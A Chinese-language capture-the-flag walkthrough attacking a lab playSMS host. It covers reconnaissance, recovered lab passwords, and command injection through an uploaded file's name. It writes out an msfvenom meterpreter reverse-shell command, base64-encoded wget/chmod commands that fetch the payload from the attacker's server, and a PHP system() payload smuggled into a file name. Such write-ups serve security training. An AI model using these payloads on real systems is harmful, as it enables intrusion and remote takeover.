CTF—攻防练习之HTTP—命令注入

主机：192.168.32.152　　

靶机：192.168.32.167

首先nmap，nikto -host，dirb 探测
robots.txt目录下

在/nothing目录中，查看源码发现pass

在secure目录下发现一个zip文件，下载下来，发现密码freedom即可打开
然后发现mp3文件其实是text文本，cat打开

发现一段文字还有个url，打开url,用户：touhid,密码尝试出为diana

 

 进入了页面

然后我们就看一看当前cms有没有已知的可利用漏洞，searchsploit playSMS

该漏洞目录是  /usr/share/exploitdb/exploits/php/webapps/42003.txt cat下，cat下该漏洞查看该漏洞描述

大致意思就是说存在一个上传点，但文件名要改成另一种格式，就可执行和上传文件相关的代码
目录在app=main&inc=core_welcome，打开确实有上传点，上传csv文件的点

 

 用bp上传抓包改文件名测试下，确实存在命令注入

那我们就可以制作并上传一个反弹shell
shell为： linux/x86/meterpreter/reverse_tcp
msfvenom -p生成

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444 elf> /var/www/html/s
重定向到apache服务器，通过执行下载命令，再修改权限
再用msfconsole监听即可

首先开启apache服务器：
survice apache2 start     开启
survice apache2 status  查看状态

再利用命令注入漏洞上传，使用命令注入漏洞时，我们可以先用base64转码绕过防火墙
echo 'wget http://192.168.32.152/s -O /tmp/a' | base64
echo 'chmod 777 /tmp/a' | base64
echo '/tmp/a' | base64

再在bp 中用命令  "<?php system(base64_decode('XXXXXXXX')); dia();?>.php"
最终完成三个命令上传拿到反弹shell